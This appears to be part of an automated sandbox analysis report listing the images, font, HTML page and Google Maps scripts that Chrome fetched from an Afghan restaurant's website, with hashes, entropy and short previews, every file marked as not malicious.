                                                                                                                                                    Preview:wOFFOTTO...,................................CFF .......4...4-+a^OS/2...(...`...`."..cmap......L...L.U.gasp................head.......6...6.i..hhea.......$...$...<hmtx...8..........'Tmaxp.............dP.name.......9...9U...post....... ... .............themify......:.............S.......S......g...z......................+..e................ .%.*./.4.9.>.C.H.M.R.W.\.a.f.k.p.u.z...................................................................$.)...3.8.=.B.G.L.Q.V.[.`.e.j.o.t.y.~.................................................................#.(.-.2.7.<.A.F.K.P.U.Z._.d.i.n.s.x.}.................................................................".'.,.1.6.;.@.E.J.O.T.Y.^.c.h.m.r.w.|.................................................................!.&.+.0.5.:.?.D.I.N.S.X.].b.g.l.q.v.{................................................................. .%.*./.4.9.>.C.H.M.R.W.\.a.f.k.p.u.z...................................................................$.)...3.8.=.B.G.L.Q.V.[.`.e.j.o.t.y.~.....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80908
                                                                                                                                                    Entropy (8bit):7.88669323421921
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:C2s6lfo2s6lfiOmNTaGMhlHNmYTMYlCczoVmI7JJp+VcPfL/DBwJIVw7Ot:MxPNuRlHLMYlFonJj+Vcb/DaKVVt
                                                                                                                                                    MD5:422E05A6EF4C914EE70087BFD4A8500A
                                                                                                                                                    SHA1:9601C262702C5A5F2EAB0058CD60F91B84B64A5F
                                                                                                                                                    SHA-256:5B849F9C2A010951DAD5E327752D12F67C4C497027897DEE43B81F6788F673E9
                                                                                                                                                    SHA-512:2F492E24F41F5EC79418FEB83146DA1FABEEB3D5BE33B9751A11C9A271F51370787C43BFBD066214A21A7891DD27872F315BCBBFAD743A56035F8874148F0215
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....&QExif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:17:24.............0221...................................0...............................r...........z.(................................$........H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.."...X_$I...&6...w.....D8.,.T...p.}.>...?y[oM-#.?..._r.yQ...l..f......=.}
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (2406)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):78365
                                                                                                                                                    Entropy (8bit):5.456753311036989
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                                                                                                                                    MD5:9E43F550A52998CA7A0FD723D116582E
                                                                                                                                                    SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                                                                                                                                    SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                                                                                                                                    SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):17802
                                                                                                                                                    Entropy (8bit):5.5031546264138305
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:gYCiBj6gaWW0oOprW352OAYQ1dTzLBrrobv75fld1qmSF2/s:VCiNLWnk852zYQ1dTztrrobv75fld1qf
                                                                                                                                                    MD5:546943202FF0F8631C8CE9A3604D1798
                                                                                                                                                    SHA1:692B6B87190A0C288D066A5410D343D1277E0268
                                                                                                                                                    SHA-256:FAB03D663915610AA1D6787FA2FDDA20E32A556D05EBD24B47A4AF33CF177A46
                                                                                                                                                    SHA-512:FC6DDA161CDE1C7F80DFDA787690C147E9D4E19C9FEFD2085E73217CF713F293C559A8E3C19AF98FFAA8E10A3D15749464C9AD09F1BA10C88C71902A1C33ACC6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/hoursAndLocation
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):120654
                                                                                                                                                    Entropy (8bit):7.936864042197478
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:uiMuLiMuDCaOIcFFhn0aJt6BJ6Ky5xhX4I:dQDCnNl0aJt6ShyI
                                                                                                                                                    MD5:A5F790FB0EB72388A2536DBB05196448
                                                                                                                                                    SHA1:8D1CA88EBF7014CDF819D886DD6341F7C6FFDA1C
                                                                                                                                                    SHA-256:AC886E194DD0CCFACE06939F84DDC47243C079138A8FD842F4C473FDC24F8B85
                                                                                                                                                    SHA-512:FFB602C7EAD506905A63F69DBF0084D1EB67DBDE954A407EFFC06163C3D6EB6B88D083154C2728962E212EA9BA039B5D90443E3B48647211816254F91F248142
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....(.Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:57:48.............0221...................................................................r...........z.(................................' .......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....G.Qy........p...Q...V...1......8h..Mi........./..}....,y"...}...B~.s.r.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):54948
                                                                                                                                                    Entropy (8bit):7.728661129285784
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:YC45/wJ45/wjhb6kNfgcnC3x1nmp840dr3zQ:v4FwJ4Fw9bOGKZrU
                                                                                                                                                    MD5:E0D22CBB9564B2C4A11D23534598CB1B
                                                                                                                                                    SHA1:DD9AE9903E022DAC1502AE8DC8C632CFE2F304E9
                                                                                                                                                    SHA-256:00785D626D2C694138A2566B7EC182A1ECA556261F393277ED82A8996AF18962
                                                                                                                                                    SHA-512:B952E3877776DCEC245A7A2BC5BDA2ACDB9641631A8663DAF21BE8921B2120BF26326BCBE674756019ADAA3859C7B6B190AA537A4F07D90C807DBE82C27385BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-01.jpg
                                                                                                                                                    Preview:....(9Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:53:07....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................65..........65..........65..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:25:59.2023:08:19 16:25:59.+10:00.+10:00.+10:00...`..........................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):121594
                                                                                                                                                    Entropy (8bit):7.90625593988897
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ufpLXfpLDuef6+ffzOBPxg+vHKPHo3XHyYk/oh2rc1T1d:ufpf5f6+3zWPxg+iPHoH1aczd
                                                                                                                                                    MD5:DE9B5A06878175121CEC74478176EF2E
                                                                                                                                                    SHA1:71429B6F15984A09C50F79724A200A4E25C75C54
                                                                                                                                                    SHA-256:6A962CA1BD977FD3D53B9E96CAE8ADB817F4B4F7E91E9D56EAEF0D8D1EF4C372
                                                                                                                                                    SHA-512:94C1747A1808FDDE9BE544805311A691F251D037A9995344096693DF31DE424945D1D00974FDD8F7DC9DBCBBB94AA484B2DECA6CC7DBDFC7E07967C5619121CC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N5.jpg
                                                                                                                                                    Preview:.....aExif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:41:14....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................68..........68..........68..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:43:49.2023:08:19 16:43:49.+10:00.+10:00.+10:00...`........................#.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):190555
                                                                                                                                                    Entropy (8bit):7.954957021533176
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:jehaehehi3CioIEiox5cxVGeWBBZROyXBHCA93o7f+GOonp2oELWSzi3cY4ipG9:KbUhiRNErx5jBROABiG4DYobEKSm3IiO
                                                                                                                                                    MD5:775875ABA6FB63229157E9E145DE01C8
                                                                                                                                                    SHA1:98E5379DE511708E83865A13EB0061FDC1F1AB81
                                                                                                                                                    SHA-256:69B7E124943D9FDA1A37726669EE17768235B4402422CEEE78AC20BC31AFBDCC
                                                                                                                                                    SHA-512:C4AF44B0DD2488D1534153DAADF050B85D55A6731C7401511D92C19779BD39C27F9FFAF810B0E665C757C3581303C344C9B1CD8EFDA0C48991A9CC81C003D130
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-12.jpg
                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:31:29.............0221...................................................................r...........z.(................................,........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?........G......w........_3=......z*s..1[F..[...o...V..l.....U]q/.....KN...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):191209
                                                                                                                                                    Entropy (8bit):7.943422058095445
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:93JTW3JTfmEx4FHGX0uTOh9l7jmdp72Rphfmz1tenuJUb/xDozwi1gF2fAV7PTew:9YSJO0u+l7Kdp72R21tenuJUb/azNgsU
                                                                                                                                                    MD5:90AB6C9FCB9047C5288A7A254F9F7220
                                                                                                                                                    SHA1:6F12E24BAED8E50C1CD394128AF26CDD8F54E471
                                                                                                                                                    SHA-256:FE5E9F3CA6689B153C1C4020746C76E72FDACB52DA12BC9A8AB52EE6D94ACF8D
                                                                                                                                                    SHA-512:423D2A8E62512DEEC0DEF7E6373F13B499E61E3FF86FF816B50E6E591CFB0D875D2D2424FD7625809D92B93090B7F75029C40B86B46998B8852FA42B53BF13D1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N6.jpg
                                                                                                                                                    Preview:....#*Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:40:35....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................39..........39..........39..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................<........2023:08:19 16:42:53.2023:08:19 16:42:53.+10:00.+10:00.+10:00............................".................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 86 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37654
                                                                                                                                                    Entropy (8bit):5.914318934454717
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:750wHdDizkH5KU5tKLCmnWWxDns8W8QSAWeEJKIzYnp/fo7oTKVJluHUZI:N5dDizvU50pW+I4AXIzaVo7VS0ZI
                                                                                                                                                    MD5:814D0B866706CF37BB0B7C1449AFBA4A
                                                                                                                                                    SHA1:6F7359220ECACA0873E9F9F5310D836EA2D0478A
                                                                                                                                                    SHA-256:8C5DD61F889ACD11490099DF2EE7DC89B883674744101C8AB27AF165881ED7BE
                                                                                                                                                    SHA-512:44700B93959AC17F2675E18D24A889E72580FCB28A9C91053E6AB608A93E9A4EC7BE4252828BD64F68DF87C64D4C5D9A4043CA0347E777C11C7A71D6FA9037F9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...V...K.......p.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 498x1436, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):92120
                                                                                                                                                    Entropy (8bit):7.910175763446956
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:3JsGJs6ctvhxiMPyGX0epGoM5qJx2frUKz8GZXyYBhpVTcKUnOOymXOpooFTLhT:3GGGvvg2GokzLVBXTcKUnOPmUood1T
                                                                                                                                                    MD5:D996F6EF932D8F371D778D23AD0F9576
                                                                                                                                                    SHA1:ECF9849247B94D898964ECC6851E849BC43A2065
                                                                                                                                                    SHA-256:1F2245002B7CF48541CBFFA5C6E8514B73C9BA7B40AB08BC07A756AF0A16B67B
                                                                                                                                                    SHA-512:3ECC60878C5A7B7E6774744CD941FD27CFFD7F337F3727A2060570F30F5E75706A32005D464EA7E183403BD50746945BC40482D8DE062A14185C04B75B93C7D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:03:07.............0221..................................................................r...........z.(.................................,.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................7.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..Q.A........7.$^.I.H.>J.-..M..+...$.I.WY....7[kL~..I>5.....R.. ......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 321x910, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):77762
                                                                                                                                                    Entropy (8bit):7.88686945084929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:VHKIWHKI+NjgZUkBq201WvDog+1kUn0sC7zom1HuOV4IDoWWjK2:VHpWHp/6kM2YWvkpJihdmNHj9
                                                                                                                                                    MD5:F92FBF67D7551188AFE07C848F29837F
                                                                                                                                                    SHA1:C327E19D329F4F5D70B8C529FC79473A10AA8B52
                                                                                                                                                    SHA-256:B85B106E9AFB5A5E40D681364297EAE653576F6F8F085A2BE73AB2414CA8F2D4
                                                                                                                                                    SHA-512:FB72671B09492ECEEC1860188D7E9EBA464A61860399CDB054613C7530A143C3E7F562A28486121471804CE90A807B0756800FABE1C9197C45EBD550A79C409B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 16:58:51.............0221.......................A...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................8.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..g...p.pl~s..unh...[Z_.......E._......j_U....Xp..........~..K.[..G.%.u.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=415, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=739], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):57952
                                                                                                                                                    Entropy (8bit):7.838112916001375
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:ip2lJcZMZp2lJcZwl+quJiEPKvrjFXcE9BAGcS:iMaiZMaO+liEi3hNfpv
                                                                                                                                                    MD5:90DD99424980A77B181ADFE909BC1788
                                                                                                                                                    SHA1:9366B8365075DE9A1DFB257C603891ED77F52E06
                                                                                                                                                    SHA-256:9EDC4104D21E78C36BD474562DDF0030B1CB219EF29338B876EEB5E480FB7E90
                                                                                                                                                    SHA-512:3EB729FCB1C82281F6D0D1C96AA28536FA7F77326F7D7039EBB2DB92EDB1C7FDD1CA3BFFE6EF39C2F4A1D169A3BDDABD90D272EE1A9242E3F3FB1FACB1EE9A0C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/special-menu-1.jpg
                                                                                                                                                    Preview:....!MExif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:12:30.............0221...................................0...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...Y.T.j.S...w4C...KF...._.Nk.K^f.....w.{..t...z..s..S(kw.......k........9
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):201780
                                                                                                                                                    Entropy (8bit):7.943643350297315
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:EQVZVkQ3GiplJkR2D98I6ctKdvugUjOMWiT4fo2g0LdNob1gNl4ZWMWOG6jofTc/:XbTZp78IRtUvuZotho1gZMiKoLc/
                                                                                                                                                    MD5:FB9364CB4E114BDFB720EBCFA415E05B
                                                                                                                                                    SHA1:CBC94FEE885EF6D9B75163F141EEA6ECEE9636A2
                                                                                                                                                    SHA-256:675FF4967DBB15F37EEDA330294D9E9EABF201B57AF785B70F29DE931D6B2497
                                                                                                                                                    SHA-512:78503E33B98806026361A3C5EF241612C53B9DBD3863573B7314962730247BC9B8809D5FB2A3140DF2D6C97432B8703757A7C13BDA1FB0909441BE1BFCD077C2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N1.jpg
                                                                                                                                                    Preview:....%|Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:43:08....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................92..........92..........92..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 15:55:19.2023:08:19 15:55:19.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (724)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3487
                                                                                                                                                    Entropy (8bit):5.373569985049004
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:rPxgYZpBnecBii6nz1hAf3UUvz6+Ze1WP1dX5n:TxgYZGy6zTOXL6Cekv5
                                                                                                                                                    MD5:5A9ABF02F5823F5A50F6B022A9FEDC3E
                                                                                                                                                    SHA1:C1C9B68A1943FBF6E41FB8A848069102337B5ABF
                                                                                                                                                    SHA-256:37F2F9F0E0D75497FE736BD0022FAFA40EEC0E9575A0E50128C8FA2DCFE01A63
                                                                                                                                                    SHA-512:63C0CB51BB815B52BF199BF1F7A77FA3B818B8CE89545314670E8B394CD322A73270F1FD53F4DC7EAA0E4C1B06BF21936CE6768270530B6C116978B80A964A89
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/overlay.js
                                                                                                                                                    Preview:google.maps.__gjsload__('overlay', function(_){var Oya=function(){},EC=function(a){a.uA=a.uA||new Oya;return a.uA},Pya=function(a){this.Eg=new _.om(()=>{const b=a.uA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},Rya=function(a,b){const c=EC(a);let d=c.Fg;d||(d=c.Fg=new Pya(a));_.rb(c.Eg||[],_.dk);var e=c.Ig=c.Ig||new _.xsa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new Qya(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.pm(d.Eg);c.Eg=[_.bk(a,"panes_changed",e),_.bk(f,"zoom_changed",e),_.bk(f,"offset_changed",e),_.bk(b,"projection_changed",e),_.bk(f,"projectioncenterq_changed",e)];_.pm(d.Eg);b instanceof _.Gk?(_.Vk(b,"Ox"),_.K(b,148440)):b
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], baseline, precision 8, 2000x843, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):390429
                                                                                                                                                    Entropy (8bit):7.976240832816254
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:Lpz0IJx3FU94J75HkAXyg+We5t/ZYskjbXyNb7Ui1jKQS/2s57+l9HRGzxQ/2uVy:Lpz0aWo75HPi9W6/GPbiR7H3S/Tx+l9Q
                                                                                                                                                    MD5:E21D1FE8FEF912A9D3A96C891D9D002B
                                                                                                                                                    SHA1:8E7E6D21C18A02EE286628718B5498298760A47E
                                                                                                                                                    SHA-256:8C5A7499548F11411344EE544037D7EE6CB8C0FE2EF8D4B455271BF232DF41B7
                                                                                                                                                    SHA-512:FC2A14E362CA7AFE0E3919C941A9E4971A8FF9CEB6B7DC5DA016DC793C7C6E13701ACF411C3E34611B9B915D32110BA07D5196452580359AF365856D132B9A9D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/header_5.jpg
